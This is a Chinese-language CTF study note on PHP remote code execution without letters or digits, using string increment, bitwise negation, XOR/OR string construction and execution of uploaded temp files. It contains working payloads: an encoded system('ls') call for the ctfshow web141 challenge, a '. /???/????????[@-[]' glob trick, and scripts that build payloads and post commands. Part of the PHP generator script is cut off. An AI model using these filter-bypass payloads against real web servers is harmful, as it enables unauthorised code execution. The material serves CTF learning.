无字母数字rce总结（自增、取反、异或、或、临时文件上传）

目录

自增

取反

异或

或

临时文件上传

---

自增

自 PHP 8.3.0 起，此功能已软弃用

在 PHP 中，可以递增非数字字符串。该字符串必须是字母数字 ASCII 字符串。当到达字母 Z 且递增到下个字母时，将进位到左侧值。例如，$a = 'Z'; $a++;将 $a 变为 'AA'。

意思就是当$a=a时，$a++ == b

这里构造payload还需要一个知识点

下划线这个可以当作变量名例如：$_   $__这样

php有一个特性当强制调用数组和字符串时，数组会被强制转换为字符串Array

例如：

设置$_为数组       $_=[]       在调用他$_=@"$_"

在这段代码中，$_=[];创建了一个空数组，并将其赋值给变量$_。然后，$_=@"$_";使用字符串拼接的方式将变量$_转换为字符串，并将结果重新赋值给变量$_。

而这样就导致@"$_"强制使数组变成了字符串，这样就让@"$_"强制转换为了Array
所以$_==Array    $_[0]==A

这里做的是无字母数字的rce所以0也不能用，使用"@"=="~"代替（@不等于~，所以返回false，而false等于0）
$_["@"=="~"]==A

webshell:      （######php大小写不敏感）

取反

这里用ctfshow的web入门141题来讲

highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];

    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/^\W+$/', $v3)){
            $code =  eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}

~在php中是取反符号

例如：

~0 = -1 

也可以用在字符串上

~a = ?

通过这个原理可以做出无数字字母的rce

shell:

payload:

v1=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8)-

异或  和   或

原理：

异或

在php里，两个值进行异或，会先转变成ASCII在转变成2进制

 异或^：数字相同为1不同为0（1^1=1，1^0=0），利用这个特性来构造字符串

0&0=0；1&1=0；0&1=1；1&0=1

例如：'a'^'$'=E

或

 按位或运算|：参与运算的两个数转化为二进制后，全为1则取1，如果是1和0这种还是取1

例如：101|100=101        101|101=101    100|100=100

此脚本的大致原理就是将EASCII（延伸美国标准信息交换码，是将ASCII码由7位扩充为8位而成）编码拿去异或，首先过一遍正则，把不需要的去掉，再把所有异或出来的信息保存到文本里，再通过python来筛选

或运算也是同理

##这里还是使用到羽师傅的脚本

=32&ord($c)<=126) {
                        $contents=$contents.$c." ".$a." ".$b."\n";
                }
        }

}
}
fwrite($myfile,$contents);
fclose($myfile);

抛出文件后使用python构造paylaod

from sys import *

def action(arg):
   s1=""
   s2=""
   for i in arg:
       f=open("xor_rce.txt","r")
       while True:
           t=f.readline()
           if t=="":
               break
           if t[0]==i:
               #print(i)
               s1+=t[2:5]
               s2+=t[6:9]
               break
       f.close()
   output="(\""+s1+"\"|\""+s2+"\")"
   return(output)

fun="system"
cmd="ls"
print("function:"+action(fun))
print("cmd:"+action(cmd))

临时文件上传

通过上传文件然后用符号.调用执行文件

第一个知识点：

通过post上传文件，此时php会在linux里的零时文件夹保存文件，且文件一定是php加上六个随机的字符      /tmp/php??????

这个应php保存的临时文件会有一个特性，就是这6个随机的字符会出现大写的情况

例如：

普通文件/tmp/adcabcabc

php保存的临时文件/tmp/phpAvxAsa

第二个知识点：

现在直到了文件上传的位置以及特性那么现在要怎么利用它

1. shell下支持使用. 来执行文件
2. linux支持glob通配符代替文件名

例如我们需要利用到/tmp/phpFsGFKd这个文件，他和其他文件的区别就是php保存的临时文件会有大写字母的出现，而glob支持利用[0-9]来表示一个范围，这就很好的解决了问题，

可以使用[@-[]这两个字符之间真好是全部大写字母，放在最后正好可以用来匹配文件名最后出现了大写字母的文件

payload：.%20/???/????????[@-[]

import requests

url = r'http://xxx.xxx/1.php?shell=?>'
file = {
    'file': 'cat flag.php'
}

response = requests.post(url, files=file)
print(response.text)